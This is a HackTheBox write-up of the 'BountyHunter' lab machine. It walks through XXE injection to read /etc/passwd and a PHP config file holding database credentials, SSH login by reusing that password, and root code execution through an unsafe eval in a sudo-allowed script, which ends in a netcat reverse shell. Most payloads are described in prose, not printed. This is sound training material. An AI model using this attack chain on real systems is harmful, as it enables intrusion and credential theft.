HackTheBox Writeup — BountyHunter
Hello Guys , I am Faisal Husaini. My username on HTB is “fa1sal” . Also join me on discord.
The IP of this box is 10.10.11.100
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.100
We found two open ports
- Port 22 → SSH
- Port 80 → Web
Way to User
Checking the web on the browser, I get a redirected to a webpage of Bounty Hunters
Clicking on the Menu button, I got listed with three options, About — Contact- Portal
The About and Contact option didnt led me to anywhere, but clicking on the Portal option leads to a page named portal.php displaying that it is under development and also shares another shortcut link
Clicking on the link redirects to the log_submit.php page which contains a Beta test of the Bounty Report System which contains some input field
Adding some data and submitting the request while intercepting it through Burp Suite shows that the data is being sent through base64 encoding
Using Burp’s decoder to decode the string, we can see that it leads to XML Code
Modifying the code to trigger XXE Injection and then encoding it back to base64
Sending the request with our modified string gives us the output of the /etc/passwd file in the response
Since, not finding any other leads, so I ran gobuster to fuzz the web directories and files
The db.php file seems to be interesting, so I modified the payload to make it fetch the file using PHP wrappers
Sending the request after putting our modified payload gave us a base64 string in the response which is the base64 encoding of the db.php file contents
Decoding the string leads us to the database credentials
Since there is no admin user on the remote machine as confirmed from the /etc/passwd file but we did had a user named development, so I tried the password with that user through SSH and got connected successfully
Getting the user flag from the user’s home directory
Way to Root
On the user’s home directory, we see a file named contract.txt which has a note on a tool on the machine
Running sudo -l command, we can seee that the current user can run sudo with no password on ticketValidator.py file on the /opt directory
Checking the content of the file, we can see that it first fetched a md file as an input and can also see that it in the evaluate method that its using the eval function in an unsafe manner which can be manipulated to get RCE as root
So I created a MD file and added contents according to the python code requirements to trigger code execution
Running the code with sudo privileges
Getting reverse shell back on netcat successfully as root
Getting the root flag from the /root directory